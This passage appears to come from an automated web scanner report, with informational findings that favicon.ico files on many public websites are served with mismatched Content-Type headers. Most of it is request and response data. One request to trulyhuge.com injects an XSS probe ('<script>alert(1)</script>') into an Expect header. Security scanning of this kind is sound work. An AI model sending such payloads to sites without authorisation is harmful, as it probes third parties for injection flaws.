User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theacc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:05 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Wed, 04 Mar 2009 21:50:04 GMT
ETag: "136b33e-47e-49aef78c"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.231. http://www.thefwa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.thefwa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefwa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 17 Feb 2010 15:50:22 GMT
ETag: "2897e-37e-ced60b80"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................HHH.......................................................................................................................................
...[SNIP]...

31.232. http://www.theminiaturespage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.theminiaturespage.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theminiaturespage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:26 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2004 22:49:41 GMT
ETag: "5f4e71-57e-7668cb40"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref="http://www.theminiaturespage.com/w3c/p3p.xml"
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...............H...H.....................................................................................................................................................
...[SNIP]...

31.233. http://www.theroyalforums.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.theroyalforums.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theroyalforums.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:02:13 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 05:10:12 GMT
ETag: "246-49d14583ad500"
Accept-Ranges: bytes
Content-Length: 582
Content-Type: text/plain; charset=UTF-8

GIF89a.....p.................-....{ .....4...........#...........V.........VP ......\S
.....6..._Y+..G..,...ld&..:..Y......ja....qe... ..,.........|ycbX.```........`..H.....@...........?..y..........
...[SNIP]...

31.234. http://www.thetelegram.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.thetelegram.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thetelegram.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:05 GMT
Last-Modified: Thu, 14 May 2009 13:59:39 GMT
ETag: "12011d-57e-469dfbd2848c0"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:46:05 GMT
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_M4_qse_vojt=ffffffffc3a09c6045525d5f4f58455e445a4a423660;path=/;httponly

..............h.......(....... ...........@................................`0.....a\............s..rH.................{{{...............................................................................
...[SNIP]...

31.235. http://www.time-to-run.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.time-to-run.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.time-to-run.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:18 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 27 Oct 2009 06:26:51 GMT
ETag: "30001eda-47e-476e4c379c0c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

............ .h.......(....... ..... ............................. ."....K...Z6..^g@u.P:..B6..ld......;+).Y..hY...................7KaF....*...O...p(.......]J.........V$...,...3...2.2...............L..
...[SNIP]...

31.236. http://www.tinymixtapes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tinymixtapes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tinymixtapes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:36:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Vary: Accept-Encoding
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.237. http://www.tnol.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tnol.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tnol.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:12 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 11 May 2006 18:32:10 GMT
ETag: "6bb0-336-4463832a"
Accept-Ranges: bytes
Content-Length: 822
Content-Type: text/plain

BM6.......6...(.........................................W...............................................k..............................................y'.................................{{.hn.Za.BL...
...[SNIP]...

31.238. http://www.top20cool.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.top20cool.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.top20cool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:52 GMT
Server: Microsoft-IIS/6.0
Last-Modified: Mon, 16 Oct 2000 14:46:29 GMT
ETag: "370b72-8be-373c34daafb40"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: text/plain; charset=UTF-8

...... ..............(... ...@...............................................................................f...3...............f...3...................f...3........f...f...f..ff..3f...f...3...3...3
...[SNIP]...

31.239. http://www.travisa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.travisa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.240. http://www.trulyhuge.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trulyhuge.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trulyhuge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:32:28 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.241. http://www.tsihomephone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tsihomephone.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tsihomephone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 06:54:05 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Mon, 13 Jul 2009 15:37:32 GMT
ETag: "71c161-3bc-19b1a700"
Accept-Ranges: bytes
Content-Length: 956
Connection: close
Content-Type: text/plain

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

31.242. http://www.tulalipcasino.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tulalipcasino.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.243. http://www.uniqlo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.uniqlo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uniqlo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 02 Apr 2009 02:46:48 GMT
ETag: "ec002-13e-7185f600"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain
Date: Tue, 03 May 2011 10:31:37 GMT
Connection: close

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

31.244. http://www.uniquedaily.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.uniquedaily.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uniquedaily.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 03 Oct 2010 01:06:12 GMT
ETag: "82c8280-47e-491ac08a0c900"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding
Content-Type: text/plain

............ .h.......(....... ..... .................................................................................................|''.............................................................f.
...[SNIP]...

31.245. http://www.usa1ink.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.usa1ink.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usa1ink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:11:34 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8i
Content-Type: text/html; charset=iso-8859-1
Content-Length: 14

File not found

31.246. http://www.usachurches.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.usachurches.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usachurches.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 30 Jun 2008 19:04:05 GMT
ETag: "10041d9-47e-450e6ec5c1340"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

............ .h.......(....... ..... ..........................ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..ff..............ff..ff..ff..ff..ff..ff..ff..ff..f
...[SNIP]...

31.247. http://www.usafootball.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.usafootball.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usafootball.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:12 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 15 Mar 2011 23:42:32 GMT
ETag: "29453-57e-49e8dfb632a00"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...........................XS...j(.........-....;........_..~..VD..........:...........vp.......S...{N........ie......K7..=(...................f............
...[SNIP]...

31.248. http://www.usagardener.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.usagardener.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usagardener.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:23:40 GMT
Server: Apache/1.3.41
Last-Modified: Fri, 15 Jan 2010 08:34:22 GMT
ETag: "3cc193d-e36-4b50288e"
Content-Length: 3638
Connection: close
Content-Type: text/plain

...... ..........&...........h.......(... ...@............................................|$..........|................................................................................................
...[SNIP]...

31.249. http://www.uscareerinstitute.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.uscareerinstitute.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.250. http://www.uschess.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.uschess.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uschess.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 07 Sep 2007 23:45:08 GMT
ETag: "3050d7d-13e-439943a9aa900"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...............................................................................................""" ."""" .....""......" ....... ....... ....... ....... ....... ....... .
...[SNIP]...

31.251. http://www.verawang.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verawang.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verawang.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Oct 2010 15:44:00 GMT
ETag: "18d174b-37e-49281764c7000"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.252. http://www.vividracing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vividracing.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vividracing.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 04 May 2010 18:49:48 GMT
ETag: "3180587-1636-485c92c7aab00"
Accept-Ranges: bytes
Content-Length: 5686
Expires: Thu, 15 Apr 2015 20:00:00 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... .... .........(....... .......................................................

.......................................... ..""..$$..))..,,...-..22..33..77..99..;;..==..>>..??
...[SNIP]...

31.253. http://www.wate.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wate.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wate.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:03:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.254. http://www.web-stat.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.web-stat.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.web-stat.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:00 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 06 Sep 2008 11:37:04 GMT
ETag: "e410b7-57e-9ae99800"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI", policyref="/w3c/p3p.xml"
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@........................33..3................................................................................................................................
...[SNIP]...

31.255. http://www.webreference.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.webreference.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webreference.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:48 GMT
Server: Apache
Last-Modified: Tue, 16 Nov 1999 14:28:10 GMT
ETag: "10b7f-13e-383169fa"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain

..............(.......(....... ................................................................................................................................................................... .....
...[SNIP]...

31.256. http://www.wehaa-ads.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wehaa-ads.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wehaa-ads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:45 GMT
Server: Apache
Last-Modified: Tue, 05 Aug 2008 18:30:22 GMT
ETag: "d1172ac3-9f6-453baa6110b80"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.257. http://www.wellspan.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wellspan.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellspan.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.258. http://www.wholesalecostumeclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wholesalecostumeclub.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wholesalecostumeclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:06 GMT
Server: Apache
ETag: W/"1406-1302908640000"
Last-Modified: Fri, 15 Apr 2011 23:04:00 GMT
Content-Length: 1406
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................& ..k...........Tm..,5......Ia..................>S........................................................................................
...[SNIP]...

31.259. http://www.wildernesscollege.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wildernesscollege.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wildernesscollege.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:45 GMT
Server: Apache
Last-Modified: Mon, 14 Apr 2008 05:31:32 GMT
ETag: "5e42fc-37e-44ace98ac7500"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... ..............................................r.~`}j..............................~..................t.3r7...........................~....".........
. ....z.r.}.........
...[SNIP]...

31.260. http://www.windows-vista-update.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.windows-vista-update.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.windows-vista-update.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:34 GMT
Server: Apache
Last-Modified: Mon, 09 Jun 2008 12:44:25 GMT
ETag: "1d9955c-e36-44f3b2be5fc40"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h...&... ..............(....... ...........@...........................7....]*.........<^......{.c.........O\....m.av+.........w....@..0n...Z9.u.......P...w.......(5..........Pb3.....[f
...[SNIP]...

31.261. http://www.winhelponline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.winhelponline.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.winhelponline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Apr 2010 11:01:53 GMT
ETag: "7a80022-1636-b90bca40"
Accept-Ranges: bytes
Content-Length: 5686
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:16:28 GMT
Connection: close
Content-Type: text/plain

..............h...&... .... .........(....... ................................. . ................%. ! .#%..+1:.17O.7:E.32c.?G_.jL*.zX(.xP1.DB_.KMY._^].WWa.X^n.o\f.vlZ.ag|.tus.25..R^..V`..ns..ns..gw
...[SNIP]...

31.262. http://www.woodsmith.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.woodsmith.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woodsmith.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:26 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 16:10:04 GMT
ETag: "fb800b-37e-49f50d3a74f00"
Accept-Ranges: bytes
Content-Length: 894
X-Internal-Server: web3
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.263. http://www.wowtattoos.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wowtattoos.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowtattoos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:18 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 05:45:15 GMT
ETag: "4486"
Accept-Ranges: bytes
Content-Length: 17542
Connection: close
Content-Type: text/plain

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...

31.264. http://www.wtma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wtma.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
